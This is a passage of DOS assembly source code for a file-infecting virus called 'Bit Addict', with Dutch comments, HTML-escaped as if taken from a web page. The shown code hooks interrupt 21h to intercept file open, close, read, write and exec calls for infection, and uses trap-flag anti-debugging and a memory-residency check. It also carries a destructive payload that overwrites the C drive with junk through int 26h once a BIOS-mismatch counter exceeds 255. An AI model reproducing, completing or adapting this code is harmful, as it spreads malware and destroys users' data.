&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; or&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; popf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; sti&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
DebugOff:&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; deze procedure zet de&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; trap-flag weer op nul en&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; herstelt interrupt 1.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cli&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pushf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; and&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,0feh&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; popf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ds,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,word ptr cs:OldInt1[0]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ds:[4],ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,word ptr cs:OldInt1[2]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ds:[6],ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; sti&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
Init:&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; OldSignature,5a4dh&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@50&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; si,offset SavedCode&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; herstel begin van het&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,100h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; com-programma&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,Dead-ComHeader+2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; rep&amp;nbsp;&amp;nbsp;&amp;nbsp; movsb&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; OldSS,ss&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; bewaar de waarden van&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; OldSP,sp&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; ss,sp,cs en ip&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; sub&amp;nbsp;&amp;nbsp;&amp;nbsp; OldSP,10h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; OldCS,es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; OldIP,100h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; short @@51&lt;br /&gt;
@@50:&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,es&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; bereken de waarden van&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,10h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; ss,sp,cs en ip&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; OldCS,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; OldSS,ax&lt;br /&gt;
@@51:&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4b40h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; controleer of Bit Addict al&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; in het geheugen aanwezig is&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@52&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ds,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,word ptr ds:ID&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; vergelijk identificatie&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,word ptr cs:ID&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@52&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; stc&lt;br /&gt;
@@52:&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
BiosCheck:&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; deze procedure vergelijkt&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,0ffffh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; de bios, met de gegevens&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ds,ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; over de bios in het virus,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; zijn deze niet gelijk, dan&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; es&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; zal het virus op een andere&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; si,si&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; computer draaien, en wordt&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,offset Bios&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; er een teller verhoogt, komt&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,10h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; deze teller boven de 255 dan&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; zal het bit-addict virus&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; repe&amp;nbsp;&amp;nbsp;&amp;nbsp; cmpsb&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; actief worden.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@54&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,cs:Count&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; inc&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,100h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jb&amp;nbsp;&amp;nbsp;&amp;nbsp; @@53&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; BitAddict&lt;br /&gt;
@@53:&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:Count,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; si,si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,offset Bios&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,10h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; rep&amp;nbsp;&amp;nbsp;&amp;nbsp; movsb&lt;br /&gt;
@@54:&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
BitAddict:&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; in deze procedure wordt&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; de c-drive overscreven met&lt;br /&gt;
@@55:&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; onzin, dit mag verandert&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,3&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; worden, om het virus iets&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,bx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; anders te laten doen, een&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,40h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; muziekje spelen, of met het&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 26h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; toetsenbord spelen&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; bijvoorbeeld.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,40h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; or&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; @@55&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
NewInt1:push&amp;nbsp;&amp;nbsp;&amp;nbsp; bp&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; deze procedure wordt&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; bp,sp&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; gebruikt bij het debuggen&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,word ptr cs:DosInt21[0]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; or&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,word ptr cs:DosInt21[2]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jnz&amp;nbsp;&amp;nbsp;&amp;nbsp; @@60&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr ss:[bp+4],300h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jae&amp;nbsp;&amp;nbsp;&amp;nbsp; @@61&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ss:[bp+2]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr cs:DosInt21[0],ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,ss:[bp+4]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr cs:DosInt21[2],ax&lt;br /&gt;
@@60:&amp;nbsp;&amp;nbsp;&amp;nbsp; and&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr ss:[bp+6],0feffh&lt;br /&gt;
@@61:&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; bp&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; iret&lt;br /&gt;
&lt;br /&gt;
DOS:&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; roept interrupt 21h aan.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,word ptr cs:DosInt21[0]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; or&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,word ptr cs:DosInt21[2]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jnz&amp;nbsp;&amp;nbsp;&amp;nbsp; @@62&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pushf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldInt21&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
@@62:&amp;nbsp;&amp;nbsp;&amp;nbsp; pushf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:DosInt21&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
Functions:&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; dit is een tabel met alle&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; dfn&amp;nbsp;&amp;nbsp;&amp;nbsp; 3ch,Open&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; dos-functies die door&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; dfn&amp;nbsp;&amp;nbsp;&amp;nbsp; 3dh,Open&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; bit-addict verandert worden&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; dfn&amp;nbsp;&amp;nbsp;&amp;nbsp; 3eh,Close&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; dfn&amp;nbsp;&amp;nbsp;&amp;nbsp; 3fh,Read&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; dfn&amp;nbsp;&amp;nbsp;&amp;nbsp; 40h,Write&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; dfn&amp;nbsp;&amp;nbsp;&amp;nbsp; 4bh,Exec&lt;br /&gt;
&lt;br /&gt;
NewInt21:&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Het nieuwe interrupt 21h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pushf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; bx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; bp&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; bp,sp&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,offset Functions&lt;br /&gt;
@@63:&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,cs:[bx]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@68&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,3&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,offset NewInt21&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; @@63&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; bp&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; bx&lt;br /&gt;
EOI:&amp;nbsp;&amp;nbsp;&amp;nbsp; popf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldInt21&lt;br /&gt;
@@68:&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,cs:[bx+1]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xchg&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,ss:[bp+2]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; bp&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
InstallCheck:&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Zo kan bit addict weten&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,cs&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; dat er al een andere copy&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; popf&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; aanwezig is&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; clc&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; retf&amp;nbsp;&amp;nbsp;&amp;nbsp; 2&lt;br /&gt;
&lt;br /&gt;
Exec:&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; al,40h&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; InstallCheck&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; CheckExtension&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; functie 4bh, infecteer eerst&lt;br /&gt;
